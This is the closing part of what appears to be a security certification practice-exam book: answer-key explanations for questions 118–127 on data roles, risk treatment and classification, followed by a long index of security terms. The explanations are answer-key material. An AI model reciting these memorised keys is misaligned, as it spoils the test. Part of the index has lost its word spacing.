118. C. Nicole is a data controller, sometimes called a data owner. She determines the reasons for processing personal information and how it is processed. A data steward carries out the intents of the data controller, data custodians are charged with safeguarding information, and data consumer is not a common data privacy role.

119. B. This is an internal disaster—one in which internal issues have led to a problem. An external disaster would be caused by forces outside the organization like a natural disaster, malicious activity, or other outside forces. An RTO, or recovery time objective, is not a type of disaster, and an MRO disaster was made up for this question.

120. C. Minimizing the amount of data that is collected is the first step in ensuring that organizations can handle the volume and types of data that they work with. After that, classifying it and then determining how long you retain it are also important parts of the data lifecycle.

121. D. Kirk has mitigated the risk to his organization by increasing the resources targeted by the DoS attack in an attempt to ensure that the attack will not be successful. Acceptance would involve simply letting the attacks occur knowing they are likely to stop, avoidance might involve finding a way to ensure the attacks cannot occur, and transfer could leverage a third-party mirror or anti-DoS hosting service.

122. A. A multiparty risk involves multiple organizations. Since there are multiple customers and organizations involved, this is an example of multiparty risk. An internal risk originates inside an organization—instead, this is an external risk. A legacy system risk is created by a system or process that is no longer supported or updated. An intellectual property (IP) theft risk occurs when proprietary information or trade secrets might be exposed or lost.

123. B. EOL, or end of life, occurs when a service or system is no longer supported, available, or does not function. Natasha needs to plan to transition smoothly away from the service, either to a replacement service or to stop using the service itself. An MOU is a memorandum of understanding, and an NDA is a nondisclosure agreement, neither of which is directly relevant here. A last will and testament is not used for a service EOL.

124. C. The Center for Internet Security (CIS) provides a wide range of OS, application, server, and other benchmarks. Microsoft provides benchmarks for their own operating systems but does not provide Linux benchmarks. The National Institute of Standards and Technology (NIST) does not provide benchmarks, but the National Security Agency (NSA) does.

125. C. Offboarding processes are conducted to ensure that accounts and access are removed and that materials, computers, and data are all recovered from the staff member when a member of an organization leaves. Exit interviews are an HR process, job rotation helps to prevent an individual from conducting fraudulent activities over time, and governance helps to manage and maintain data by establishing high-level control over the processes, procedures, and classification of the data an organization uses.

126. D. Public, private, sensitive, confidential, critical, and proprietary are all commonly used data classification labels for business. Secret, however, is more commonly used in government classification schemes.

127. D. Privacy notices are frequently provided as part of license or contractual terms, as well as in website usage agreements.

Index

A

academic journals, 211
acceptable use policy (AUP), 161, 172, 283, 290
access control lists (ACLs), 130, 266–267
access policies, 265–266
accounts
  disabling, 254
  Guest, 103–104, 113, 251, 258
  service, 251, 293
  user, 258
active nodes, 238–239
active reconnaissance, 29, 203
active scans, 16, 195
ad hoc wireless networks, 98–99, 248
Address Resolution Protocol (ARP)
  blocking, 257
  poisoning, 2, 7, 24, 25, 186, 190, 200
  spoofing, 200
administrative controls, 287
Advanced Encryption Standard (AES), 52, 217
advanced persistent threats (APTs), 13, 18, 20, 21, 191, 193, 196, 197, 273
adware, 17, 193, 195, 198
air gapping, 78, 213, 235
AIS service, 208
alarms, 68, 227–228
allow lists, 130, 266–267
annual loss expectancy (ALE), 167, 169, 287, 289
annual rate of occurrence (ARO), 169, 287, 289, 295
anomaly-based detection systems, 263
anonymization, 171–172, 290
antivirus (AV) programs, 10, 165, 191, 284, 285
Apache log, 38, 209
application blocklist, 274
application counter, 221
application programming interface (API), 5, 51, 79, 188, 216, 236, 258
Arduino, 48, 214
artifacts, 270, 272
artificial intelligence (AI), 210
asset management policies, 291
asset value (AV), 295
asymmetric cryptography, 71, 230
asymmetric warfare, 196
@ command, 275
attestation processes, 233
attribute-based access control (ABAC), 114, 255, 259
audio steganography, 77, 234
audit/auditing, 196, 198, 262
authentication, authorization, and accounting (AAA), 231
Authentication Header (AH), 85, 239, 248
authority, 24, 200
automation, 225
Autopsy, 274, 275
awareness training, 5, 188

B

backdoor, 8, 19, 21, 22, 24, 190, 196, 198, 200
back-off algorithms, 246
backups, 130–131, 267
badges, 66, 226
BadUSB, 199
baseline configurations, 53, 217
baselining, 56, 219, 245
Bash shell, 26, 150, 201, 278
bastion host, 249
Bcrypt algorithm, 80, 236
biometric scans, 48, 214–215
birthday attack, 11, 12, 21, 28, 192, 198, 203
bit, 214
BitLocker keys, 230
black hole, 52, 216
black-box test, 190, 200, 201, 203, 204
blacklisting, 91, 243, 244
block cipher, 214
blockchain, 51, 216
blue teams, 4–5, 22, 30, 188, 199, 204
bluejacking, 3, 5, 10, 11, 27, 32, 186, 188, 191, 192, 202, 205
bluesnarfing, 5, 10, 32, 188, 191, 205
bollards, 55, 66, 219, 226
bookmarks, 271
boot attestation, 254
boot sector virus, 16, 17, 195
botnets, 7, 17, 189, 195
Bridge Protocol Data Unit (BPDU), 262
bring your own device (BYOD), 105, 252
brute-force attacks, 12, 13, 19, 21, 71, 192, 193, 197, 198, 203, 230
buffer overflow, 5, 16, 18, 21, 22, 26, 188, 194, 195, 196, 198, 199, 201, 243
bug bounties, 35, 207
burning media, 79, 236
business continuity plan (BCP), 275
business impact analysis (BIA), 165, 177, 285, 293
business partnership agreement (BPA), 162, 165, 179, 283–284, 286, 294

C

cable locks, 55, 219
Cacti, 274
captive portal, 83, 238
card cloning, 29, 198, 203
cat command, 269
Center for Internet Security (CIS), 167, 174, 180–181, 183, 287, 291, 297
CentOS, 270
certificate authority (CA), 264
certificate chains, 262
certificate expiration tracking, 204
certificate pinning, 266
certificate revocation lists (CRLs), 241
certificate stapling, 85, 239
-c flag, 268
chain of custody, 132–133, 268, 273
Challenge Handshake Authentication Protocol (CHAP), 106, 120, 251, 252, 263
change management, 161, 282–283
CIA triad, 202
clean desk policy, 161, 162, 164, 169, 283, 285, 289
clickjacking, 3, 44, 186, 212
client-side tampering, 48, 214
closed threat intelligence, 205
closed-circuit television (CCTV), 71, 165, 230, 286
cloud access security broker (CASB), 59–60, 125, 222, 239, 265
cloud applications, 264
cloud backups, 223
Cloud Control Matrix maps, 292
cloud firewall, 103, 251
Cloud Security Alliance, 292, 295
cloud service
  providers in, 234
  vulnerabilities in, 204
code
  digitally signed, 248
  formatting, 195
  reviewing, 247
  signing, 244
code reuse attack, 61, 223
cold aisle, 59, 221
cold site, 50, 68, 215, 228
collisions, 12, 71, 193, 230
collusion, 169, 288–289
common name (CN), 90, 242
Common Vulnerabilities and Exposures (CVE), 11, 192, 211
community cloud, 64, 65, 225
compensating control, 164, 285, 287
conditional access, 118, 261
configuration
  managing, 259
  reviews of, 212
  weak, 196
consensus, 16, 194
containerization, 252
containment, 132, 150, 268, 278, 280
content filter, 272
Content-Addressable Memory (CAM), 272
context-aware authentication, 249
Continuity of Operations Planning (COOP), 133, 147, 150, 268, 276, 278
continuous integration/continuous delivery (CI/CD), 64, 225
control diversity, 235
control risks, 290, 296
cookies, 88, 241
corrective control, 284
correlation dashboards, 130, 267
counter mode (CTR), 50–51, 215
coverage overlap, 254
credential harvesting, 5, 188
credentialed scan, 17, 195
criminal syndicates, 9, 191
cross-over error rate (CER), 65, 70, 226, 229
cross-site request forgery (XSRF), 11, 16, 21, 26, 36, 44, 192, 194, 198, 201, 208, 212
cross-site scripting (XSS), 2, 3, 5, 6, 7, 11, 16, 20, 21, 26, 36, 186, 188, 190, 192, 194, 197, 198, 201, 208
cryptographic hashes, 186, 227
Cuckoo, 146, 276
Cuckoo Sandbox, 136, 270
curl command, 155, 281
customer data, 293
CVSS standard, 132, 267
Cyber Kill Chain, 132, 145, 267, 276
cyber intelligence fusion, 11, 192

D

dark web, 30, 203
data
  governance policy for, 172, 290
  masking of, 166, 286, 295
  minimization of, 166, 182, 286, 296
  retention policy for, 167, 169, 287, 289
  storing, 223
data breaches
  common results of, 290
  cost of, 293
  notifications for, 277
  recovering from, 292
data controller, 296
Data Encryption Standard (DES), 52, 217
data loss prevention (DLP), 72, 124, 139, 142–143, 231, 253, 265, 272, 274, 277
data owner, 296
data processors, 180, 295
data protection officer (DPO), 176, 292
data retrieval, 241
data sovereignty, 229
database administrator (DBA), 226
deadbolts, 229
deepfakes, 219
degaussing, 79, 236, 258, 273
demilitarized zone (DMZ), 72, 78, 89, 90, 107, 108, 111, 112, 230, 231, 235, 242, 243, 253, 255, 257
denial-of-service (DoS) attack, 22, 34, 38, 198, 206–207, 209–210
deployment policies, 53, 217
deprovisioning, 56, 219
detective control, 163, 164, 167, 284, 285, 286, 287
deterrent control, 164, 167, 284, 285, 287
development server, 51, 216
Diamond Model, 132, 267
dictionary attacks, 9, 12, 28, 191, 192, 203
differential backups, 65, 225
digital certificates, 246, 260
digital forensics, 57, 220, 268, 270, 272, 273, 277, 281–282
digital signatures, 48, 76, 214, 233
directory traversal attacks, 30–31, 204
disassociation attack, 12, 13, 192, 193
disaster recovery (DR) plan, 147, 154, 172, 175, 180, 276, 281, 290, 292, 296
discretionary access control (DAC), 111, 114, 257, 259
disk backup, 62, 223
Distinguished Encoding Rules (DER) format, 126, 266
distributed denial-of-service (DDoS) attack, 13, 22, 187, 190, 193, 195, 198, 222
DLL injection, 18, 196
DNS logs, 133, 268–269
dnsenum tool, 147, 276, 277
domain experts, 207
domain hijacking, 6, 189
Domain Name System (DNS)
  DNS hijacking, 6, 189
  DNS server, 212
  DNS sinkhole, 58, 221
  poisoning attacks, 7, 21, 24, 190, 198, 200
Domain Name System Security Extension (DNSSEC), 99, 238, 248
domain reputation services, 8, 190
domain theft, 189
downgrade attacks, 12, 31, 193, 204
drones, 57, 206, 220, 233
dual control, 237
due care, 161, 282–283
due diligence, 161, 282–283
dump file, 279
dumpster diving, 28, 191, 202
dynamic code review, 247
Dynamic Host Configuration Protocol (DHCP), 87, 101, 240, 250, 279

E

EAPTunneledTransportLayerSecurity(EAP-TTLS),94,245,251

EAP-FAST,94,245

east-westtraffic,82,237

edgecomputing,74,232,236

802.1x,80,119,236,262

elasticity,incloudcomputing,56,226

electromagneticinterference(EML),218

electronicdiscovery(e-discovery),282

electroniclocks,229

elicitation,16,195

ellipticalcurvecryptography(ECC),74,214,215,232

emailheaders,278

embeddedsystems,216,224

encryption,76,78,101,234,235,249

encryptionkeys,231

endoflife(EOL),183,297

endpointdetectionandresponse(EDR),102,250

entropy,54,218

errorhandling,14,44,194,212

escalation,284

eviltwinattack,10,11,20,24,32,191,192,197,200,205

exitinterviews,193,297

exposurefactor(EF),295

extendedvalidation(EV),252

ExtensibleAuthenticationProtocol(EAP),251

F

facial recognition systems, 71, 223, 230

fake telemetry, 56, 219

false acceptance rate (FAR), 70, 226, 229

false negative, 15, 36, 194, 208

false positive, 15, 36, 194, 208

false rejection rate (FRR), 70, 229

familiarity, 16, 194

Faraday cage, 55, 69, 218, 229, 233

Federal Bureau of Investigation (FBI), 150, 278

Federal Emergency Management Agency (FEMA), 150, 278

Federal Trade Commission (FTC), 174, 291

Feedburner, 34, 206

fencing, 232

FIDO U2F, 84, 238

field-programmable gate array (FPGA), 48, 214

file permissions, 266

File Transfer Protocol (FTP), 16, 195

File Transfer Protocol Secure (FTPS), 239

fileless virus, 199

file systems, 256

fingerprint reader systems, 62, 223

firewalls, 77, 88, 216, 234, 241, 286

firmware, 223, 269

5G, 79, 236

fog aggregator, 101, 249

fog computing, 80, 236

footprinting, 35, 207

formatting code, 195

forward proxy, 112, 114, 257

FTK Imager, 270, 274

full-disk encryption (FDE), 52, 63, 90, 112, 117, 216–217, 219, 224, 226, 242, 252, 253, 258, 261, 275

fully qualified domain name (FQDN), 242

function-as-a-service (FaaS), 221

fuzzing, 101, 245, 249–250, 252

G

gait analysis, 64, 225

gamification, 175, 292

General Data Protection Regulation (GDPR), 162, 170, 283, 289, 292

generator, 75, 233

generators, 165–166, 286

geofence, 95, 245

geolocation, 213

GitHub, 40, 210

Global Positioning System (GPS), 89, 241

government data, 290

gray market, 38, 209

gray-box test, 201

grep command, 144, 275

Guest accounts, 103–104, 113, 251, 258

H

hacktivism, 196

hacktivists, 18, 19, 39, 196, 210

hardening, 93, 242, 244, 259

hardware firewall, 103, 251

hardware security module (HSM), 52, 95, 217, 246, 256, 259

hash functions, 47, 213, 214

hashing, 101, 130, 249, 266, 269, 275, 295

hashing passwords, 71, 74, 223, 230, 232, 244

head command, 269

health information, 172, 290

heat maps, 243

HMAC-based one-time password (HOTP), 69, 228, 231, 238

hoax, 36, 208

homomorphic encryption, 62, 223

honeyfiles, 80, 236

honeynets, 52, 215, 216

honeypots, 49–50, 52, 215, 216, 219

host-based firewalls, 117, 261

host-based intrusion prevention system (HIPS), 117, 259, 261

hot aisle, 59, 221

hot site, 50, 68, 215, 228

hping tool, 152, 279

HTTP ports, 211

HVAC systems, 53, 218

hybrid computing, 74, 232

hybrid deployment model, 65, 225

hybrid models, 54, 218

hybrid warfare, 36, 208

hypervisor, 54, 218, 273

I

identity and access management (IAM), 231

identity attributes, 242

identity fraud, 39, 210

identity provider (IdP), 83, 238

identity theft, 210

identity-as-a-service (IDaaS), 58, 221

impact categories, 211

impersonation, 16, 195

incident response, 267, 273, 276, 278

indicators of compromise (IoC), 4, 187

industrial camouflage, 72, 230

inert gas systems, 233

Information Sharing and Analysis Centers (ISACs), 206

infrared (IR), 71, 230, 251

infrastructure as a service (IaaS), 54, 58, 64, 78, 209, 218, 221, 225, 235, 253

infrastructure as code (IaC), 60, 222

inherent risk, 179, 181, 295

initialization vectors (IVs), 2, 11, 186, 192, 232

input handling, 40, 210

input validation, 2, 186, 243, 249–250

insider threats, 18, 196, 261

integer overflow, 22, 26, 199, 201

integrity checking, 56, 219

intelligence fusion, 33, 205

interconnection security agreement (ISA), 162, 176, 283–284, 292

internal disaster, 296

internal risks, 289

internal services, 255

International Organization for Standardization (ISO), 295

Internet key exchange (IKE), 249

Internet Relay Chat (IRC), 202

intrusion detection system (IDS), 2, 13, 49–50, 52, 58, 117, 139, 174, 186, 193, 215, 216, 221, 227, 241, 250, 261, 272, 291

intrusion prevention system (IPS), 38, 52, 113, 165, 188, 209–210, 211, 216, 227, 241, 253, 258, 261, 279, 286, 291

intrusive scan, 17, 19, 195, 196

invoice scams, 25, 200

IP addresses, 70, 216, 229, 240, 250, 266

IP spoofing, 20, 23, 44, 197, 199, 212

IPFIX, 156, 282

IPSec, 88, 143, 239, 241, 263, 274

iptables, 273

iris scans, 62, 223

ISA/IEC standards, 46, 212

ISO 27002, 161, 282

ISO 27017, 161, 282

IT process, 277

J

jailbreaking, 104, 252

jamming attack, 2, 186

job rotation policy, 161, 164, 166, 169, 179, 283, 284–285, 286, 288–289, 294

John the Ripper, 149, 278

journalctl tool, 155, 156, 281, 282

jump boxes, 253

jurisdictional boundaries, 149, 278

K

Kerberos, 60, 102, 103, 106, 107, 109, 116, 222, 250, 251, 252, 254, 260

key distribution center (KDC), 116, 260

key escrow, 108, 254

key length, 231

key reuse, 72, 73, 230, 232

key stretching, 48, 214, 236

keylogger, 13, 193

keys, 214

knowledge-based authentication, 242

known environment test, 7–8, 17, 24, 25, 31, 190, 195, 200, 201, 204

L

lateral movement, 15, 194

least connection-based load balancing, 85, 239

least privilege, 161, 282

legacy systems, 33–34, 206, 291

legal hold, 280

lighting, as a deterrent, 74, 232

Lightweight Directory Access Protocol (LDAP), 29, 56, 80, 96, 203, 219, 236, 246, 255

Lightweight Extensible Authentication Protocol (LEAP), 104, 237, 251

Linux kernel, 232

Linux privilege, 207

load balancing, 102, 247, 250

locks, 69, 70, 162, 181, 229, 283, 296

log aggregation, 4, 187, 196

logger utility, 273

logging, 199

logic bomb, 2, 9, 10, 14, 16, 18, 19, 22, 27, 28, 186, 190, 191, 194, 195, 196, 199, 201, 202

loop protection, 123, 264

low-power devices, 70–71, 229–230

M

machine learning (ML), 207, 210

macro virus, 9, 17, 190, 195

malware, 8, 26, 27, 186, 189, 190, 191, 194, 195, 196, 201, 212, 237–238, 282

managed security service providers (MSSPs), 227

mandatory access control (MAC), 14, 111, 114, 193, 233, 257, 259, 281, 294

mandatory vacation policy, 161, 162, 283

man-in-the-browser attack, 26, 201

mantrap, 219

mapping networks, 271

masking, 74, 78, 232, 235

MD5, 80, 236, 269

mean time between failures (MTBF), 168, 169, 171, 172, 288, 289, 290

mean time to repair (MTTR), 168, 169, 171, 288, 289, 290

measured boot, 259

media, burning, 236

Media Access Control (MAC), 188

memdump tool, 273

memorandum of understanding (MOU), 162, 176, 179, 183, 283–284, 292, 294, 297

memory exhaustion, 202

memory leaks, 22, 199, 201, 202, 231

Metasploit, 146, 276

MFPs, 222

microcontroller, 214

microservice architectures, 222

Microsoft Office, 277

misconfiguration, 192

mist computing, 74, 232

MITRE ATT&CK framework, 132, 267

mobile application management (MAM), 264

mobile device management (MDM), 82–83, 113, 116, 117, 124, 237, 258, 260, 265, 272, 275

motion activation, 71, 230

motion detection, 69, 228

motion recognition, 58, 221

multifactor authentication, 5, 78, 188, 235, 262

multipartite virus, 27, 201

multiparty risk, 183, 297

Multipurpose Internet Mail Extensions (MIME) sniffing, 82, 237

MX records, 270

N

naming conventions, 224

National Institute of Standards and Technology (NIST), 180–181, 295

National Security Agency (NSA), 150, 174, 278, 291, 297

nation-state actors, 19, 196, 197

natural disasters, 76, 233

Near-Field Communication (NFC), 23, 103, 199, 251

Nessus, 134–135, 146, 269, 276

net user command, 262

netcat command, 137, 270

NetFlow, 134, 269, 271

netstat command, 133, 153, 156, 268, 280, 282

network address translation (NAT), 102, 118, 250, 261

network attached storage (NAS), 46, 62, 213, 223

network flows, 269, 271

network interface cards (NICs), 229

network intrusion detection system (NIDS), 67, 227

network intrusion prevention system (NIPS), 52, 67, 216–217, 227, 249

network load balancers, 77, 234

network location, 213

network taps, 248

Network Time Protocol (NTP), 240, 251

network-based intrusion prevention system (NIPS), 100, 248

New Technology LAN Manager (NTLM), 102, 109, 250, 254

next-generation firewalls (NGFWs), 111–112, 256, 257, 264

NIC teaming, 70, 229

NIST 800-12, 282

NIST 800-14, 282

nmap tool, 133, 268

nondisclosure agreement (NDA), 162, 179, 183, 283, 286, 294, 297

nonintrusive scan, 19, 196

normalization, 56, 219, 226

North American Electric Reliability Corporation (NERC), 46, 212

NULL pointer, 3, 187

NXLog, 150, 156, 278, 282

O

OATH-HOTP, 238

OAuth, 60, 80, 107, 110, 222, 236, 253, 255, 263

object detection, 69, 228

offboarding, 164, 170, 193, 284–285, 289, 297

offsite storage, 224

onboarding, 162, 164, 166, 170, 283, 284–285, 286, 289

One Time Password (OTP), 238

Online Certificate Status Protocol (OCSP), 89, 239, 241

on-path (man-in-the-middle) attack, 25, 26, 28, 201, 202

on-premises cloud computing, 235

on-premises networks, 217

open source firewalls, 265

open source intelligence (OSINT), 4, 16, 29, 31, 32, 187, 189, 195, 203, 205

Open Web Application Security Project (OWASP), 46, 211, 212

OpenID, 56, 60, 100, 107, 109, 110, 219, 222, 248, 253, 254, 255, 263

OpenPGP, 238

OpenSSL, 275

openssl command, 269

OpenVAS scanner, 42, 211

operating system (OS) threats, 114–115, 215, 259

operational security (OPSEC), 29, 203

operational technology (OT), 35–36, 198, 207–208

order of volatility, 273–274

original equipment manufacturer (OEM), 72, 231

out-of-band (OOB) management, 108, 253

over-the-air (OTA), 123, 264

P

packet capture, 4, 187

parking policy, 164, 285

partially known environment test, 195, 201

passive reconnaissance, 29, 189, 203

pass-the-hash attack, 24, 191, 200

Password Authentication Protocol (PAP), 103, 251

password cracker, 275, 278

password hashing, 247

password history, 262

password managers, 248

password spraying, 19, 197

password vaults, 248

passwords

aging, 263

complexity of, 258

storing, 142, 208, 274

patching, 95, 174, 246, 281, 291

pathping, 276

Payment Card Industry Data Security Standard (PCI-DSS), 162, 171, 175, 283, 290, 292

PBKDF2 algorithm, 236

penetration tests, 5, 28, 37, 68, 188, 191, 196, 199, 202, 205, 209, 227–228

pepper, 3, 186

perfect forward secrecy (PFS), 49, 214

permissions

auditing, 257

setting, 35, 207

permissions creep, 3, 187

personal identification number (PIN), 241

Personal Information Exchange (PFX), 87–88, 240–241

personally identifiable information (PII), 235, 291

personnel credential policy, 293

-p flag, 267

pharming attacks, 19, 197

phishing, 2, 6, 9, 13, 23, 25, 27, 28, 36, 186, 189, 191, 193, 199, 200, 202, 208, 217

picture passwords, 47, 213

pie charts, 31, 205

ping command, 271

pivot, 8, 190

plain-text password attack, 10, 191

platform as a service (PaaS), 54, 58, 64, 73, 78, 218, 221, 225, 232, 235

playbooks, 142, 154, 274, 276, 281

point-to-multipoint topology, 248

point-to-point topology, 248

policies, 283, 285, 289, 294

polymorphic virus, 198

POP3, 85, 239

port scans, 211, 270

port security, 83, 238, 248

Postgres server, 194

potentially unwanted programs (PUPs), 14, 21, 29, 193, 198, 203

power distribution unit (PDU), 75, 226, 233, 247

PowerShell, 23, 40, 199, 211, 222

predictive analysis, 4, 187, 210

prepending, 20, 33, 37, 197, 206, 209

preproduction environments, 216

preshared key (PSK), 100, 244–245, 248

pretexting, 16, 33, 195, 206

preventive controls, 166, 167, 286, 287

prime factorization algorithms, 50, 215

Privacy Enhanced Mail (PEM) files, 126, 240–241, 266

privacy notices, 184, 296, 297

private cloud, 65, 78, 225, 235

private keys, 48, 49, 214, 247, 280

privilege creep, 80, 236

privilege escalation, 13, 15, 20, 34, 193, 194, 197, 206–207

privilege scan, 195

privileged access management (PAM), 265

production server, 51, 216

proprietary data, 285, 293

proprietary intelligence, 32, 205

protected cable distribution, 77, 234

Protected Extensible Authentication Protocol (PEAP), 94, 237, 245

protocols, 212

provenance, 151, 275, 279

proximity card readers, 75, 233

PRTG, 274

pseudonymization, 171–172, 290

public cloud, 64, 65, 225

public key infrastructure (PKI), 256, 264

public keys, 48, 49, 214, 247

purple teams, 4–5, 22, 30, 188, 199, 204

push notifications, 82–83, 237

Python, 17, 195

Q

qualitative risk assessment, 162, 165, 174–175, 283, 285, 291

quality assurance (QA), 216

quantitative risk assessment, 162, 165, 168, 174–175, 283, 285, 288, 291

quantum computing, 72, 231

quantum cryptography, 215

quantum encryption, 50, 215

quarantine process, 153, 272, 280

Qubits, 215

quick formatting, 148, 277

R

race conditions, 14, 23, 194, 199

radio frequency identifier (RFID), 11, 23, 27, 75, 96, 192, 199, 202, 233, 246

RAID, 55, 56, 71, 218, 219, 230

rainbow tables, 9, 12, 21, 191, 193, 198, 203, 298

ransomware, 22, 199

Raspberry Pi, 48, 214

rate limiting, 246

rebooting, 276

reconnaissance phase, of penetration testing, 37, 209

recovery, 131, 267

recovery point objective (RPO), 169, 289

recovery time objective (RTO), 166, 177, 287, 292

Red Hat, 270

red teams, 4–5, 22, 24, 30, 188, 199, 200, 204

refactoring, 8, 36, 190, 208

registration authority (RA), 239

remote access, 246

Remote Authentication Dial-in User Service (RADIUS), 56, 100, 219, 231, 246, 248

remote registry, 254

remote wipe, 82–83, 237, 252

remote-access Trojan (RAT), 10, 14, 17, 21, 29, 32, 191, 193, 195, 198, 203, 205

replay attack, 25, 29, 201, 203

reputational gains, 210

requests for comments (RFCs), 63, 224

resource constraints, 234

resource policies, 54, 218

resource-based policies, 98, 247

restoration order, 213

retention policies, 138, 271

retina scans, 62, 223

reverse proxy, 112, 114, 125, 127, 257, 266

reverse shell, 205

-R flag, 272

right-to-audit clauses, 280

risk acceptance, 163, 166, 167, 168, 284, 287, 288

risk avoidance, 163, 166, 167, 168, 284, 287, 288

risk heat maps, 174–175, 291

risk mitigation, 163, 166, 167, 168, 182, 284, 287, 288, 297

risk register, 166, 171, 287, 290

risk transfer, 163, 166, 167, 168, 284, 287, 288

robocalling, 28, 202

rogue access point, 3, 11, 186, 192

role-based access control (RBAC), 110, 111, 114, 255, 257, 259

root certificate, 249

root grabbing, 13, 193

Root Guard, 240

rootkit, 2, 9, 10, 13, 14, 19, 22, 27, 186, 190, 191, 193, 194, 196, 199, 201, 202

route command, 268

RSA key, 49, 214

RSH, 16, 195

RTO, 50, 215

RTOS, 61, 223

rule of engagement, for penetration tests, 32, 205

rule-based access control, 255

S

salts, 3, 49, 79, 186, 214, 223, 235

sandboxing, 53, 54, 217, 218, 244

scalability, in cloud computing, 56, 226

scanless tool, 136, 270

scarcity, 5, 16, 188, 194

script kiddies, 6, 18, 33, 189, 196, 205

scripting, 65, 225

scrypt algorithm, 236

secrets management services, 102, 250

secure cookies, 241

secure IMAPs, 247

Secure Lightweight Directory Access Protocol (LDAPS), 115, 259

Secure POP3, 84, 238

Secure Shell (SSH), 43, 86, 97, 98, 195, 212, 238, 240, 247, 253, 278

Secure Sockets Layer (SSL), 31, 67, 204, 220, 227

Secure/Multipurpose Internet Mail Extensions (S/MIME), 84, 238

Security Account Manager (SAM) file, 204

Security Assertion Markup Language (SAML), 56, 60, 80, 102, 116, 219, 222, 236, 250, 253, 255, 260, 263

security audits, 5, 188

Security Enhanced Linux (SELinux), 265

security groups, 117, 261

security guard, 59, 69, 221, 229

security information and event management (SIEM) device, 4, 31, 72, 187–188, 204, 205, 210, 231, 249

security monitoring, 187–188

security orchestration, automation, and response (SOAR), 8, 31, 39, 190, 204, 210

security zones, 90, 242–243

segmentation, 150, 151, 255, 275, 278, 279

segmentation fault, 187

self-encrypting drive (SED), 52, 63, 217, 224

self-signed certificate, 87, 240

sensor appliances, 247

sensors, 272

separation of duties, 166, 169, 179, 286, 288–289, 294

serverless architectures, 58, 221

server-side request forgery (SSRF), 7, 36, 189, 208

service accounts, 251, 293

service level agreement (SLA), 162, 176, 179, 283–284, 286, 292, 294

service organization report (SOC), 39, 210

Service Set Identifiers (SSIDs), 246

session hijacking, 3, 12, 13, 18, 26, 186, 192, 193, 196, 201

session IDs, 211

Session Initiation Protocol (SIP), 239, 270, 278

session persistence, 253

sFlow, 269, 271

SFTP, 195

SHA1 algorithm, 80, 236, 269

shimming, 8, 24, 190, 200

Shiva Password Authentication Protocol (SPAP), 103, 251

short message service (SMS) messages, 69, 217, 228

shoulder surfing, 25, 28, 33, 200, 202, 206

signage, 68, 228

silent patching, 36, 208

Simple Network Management Protocol (SNMP), 98, 120, 126, 247, 252, 263, 266, 274

simulation, 272

simultaneous authentication of equals (SAE), 243

single loss expectancy (SLE), 163, 284, 295

single point of failure (SPOF), 168, 176, 288, 292

Single Sign-On (SSO), 113, 255, 258

site survey, 237

skimmer, 29, 203

smart cards, 68, 69, 227, 229, 238

smishing, 27, 189, 202

SMS pushes, 234

Smurf attack, 25, 200

snapshots, 54, 65, 218, 225

SOC 2 engagement, 294

social engineering, 9, 16, 24, 187, 191, 194, 195, 200, 206

social login, 73, 231

social media influence campaigns, 18, 196

social proof, 194

software

compiling, 63, 224

updates for, 202

software as a service (SaaS), 54, 58, 73, 218, 221, 232

software firewall, 103, 251

software-defined networking (SDN), 52, 55, 59, 67, 217, 218, 221, 227

source code, 290

SourceForge, 40, 210

spam, 6, 189

sparse infector virus, 195

spear phishing, 2, 9, 28, 186, 189, 191, 202

SPIM, 3, 187

split horizon DNS, 99, 248

split-tunnel VPNs, 123, 264

spyware, 14, 193, 198

SQL injection, 2, 3, 10, 20, 22, 51, 57, 186, 189, 191, 197, 198, 216, 220, 245, 280

SRTP, 238

SSH File Transfer Protocol (SFTP), 252

staging environments, 51, 216

staging server, 53, 217

stakeholder management, 133, 138, 268, 271

standards, 224

state actors, 18, 196

state laws, 294

stateful inspection firewall, 91, 243

stateful packet inspection (SPI), 91, 243

stateless firewall, 255

Statement of Standards for Attestation Engagements (SSAEs), 290

static codes, 230, 245, 247, 252

storage area network (SAN), 54, 62, 218, 223

stored procedures, 66, 220, 226

storm control, 257

stream ciphers, 192

string injection, 243

strings command, 136, 270

Structured Query Language (SQL), 203

Structured Threat Intelligence Exchange (STIX) protocol, 23, 29, 199, 203

Subject Alternate Name (SAN), 246

subnet mask, 46, 212

subscriber identity module (SIM), 234

subscription services, 241

Supervisory Control and Data Acquisition (SCADA) system, 52, 67, 215, 216–217, 227

supply chain risk, 291

swap files, 34, 206–207, 273

symmetric cryptography, 71, 230

symmetric encryption, 49, 53–54, 214, 218

SYN flood, 33, 206, 243

syslog, 38, 152, 156, 209, 279, 282

system crash file, 274

system dump file, 274

system on a chip (SoC), 224

system restore point, 68, 228

T

tabletop exercises, 267

tagging drives, 279

tail command, 269

tailgating, 23, 39, 199, 210

tape backups, 62, 223

TAXII, 23, 199

TCP handshakes, 4, 187

TCP port 23, 34, 206

TCP port 443, 43, 212

tcpdump, 267

tcpreplay tool, 279

technical controls, 286

Telnet, 16, 43, 195, 206, 212

Terminal Access Controller Access Control System Plus (TACACS+), 116, 260

terminate and stay resident (TSR), 220

test server, 51, 216

testing, 284

theHarvester, 132, 267

third-party code, risks of, 59, 222

third-party credential policies, 295

third-party risks, 210

third-party secure destruction companies, 47, 213

threat actors, 207

threat assessment, 165, 285

threat hunting, 37, 208

threat intelligence, 205

threat maps, 31, 205

threat vectors, 40, 210

thumb drives, 71, 230

time-based one-time password (TOTP), 69, 228

timeboxing, 249–250

timelines, building, 277

time-to-live (TTL), 137–138, 271

TLS inspection, 56, 220

tokenization, 74, 101, 180, 232, 249, 295, 296

tokens, 77, 78, 110, 235, 255

Tor, 30, 203

TOTP, 238

tracert command, 143, 147, 274, 276

traffic, stopping, 244

training, 284, 292

transit gateways, 53, 217

Transport Layer Security (TLS), 67, 86, 90, 103, 104, 105, 108, 193, 227, 239, 240, 242, 251, 252, 253

trends, 281

Trojan horse, 2, 8, 9, 14, 17, 19, 21, 27, 28, 31, 34, 44, 186, 190, 193, 194, 195, 196, 198, 199, 201, 202, 204, 206–207, 212

trusted boot, 259

Trusted Foundry, 31, 46, 205, 212

Trusted Platform Module (TPM), 55, 63, 90, 115, 218, 224, 226, 242, 244, 249, 250, 259, 264

trust/trusting, 24, 200, 210, 244

two-factor authentication, 219

two-person control schemes, 73, 231

typosquatting, 6, 44, 188–189, 212

U

UEFI Secure Boot, 263

unified endpoint management (UEM), 116, 260

Unified Extensible Firmware Interface (UEFI), 115, 254, 259, 261, 263

unified threat management (UTM), 258

uniform resource locator (URL)

URL filter, 154, 281

URL redirection, 26, 30, 201, 204

URL shortening, 204

uninterruptible power supply (UPS), 66, 75, 226, 233, 247

universal endpoint management (UEM), 125, 265

unknown environment test, 7–8, 24, 25, 31, 190, 195, 200, 201, 204

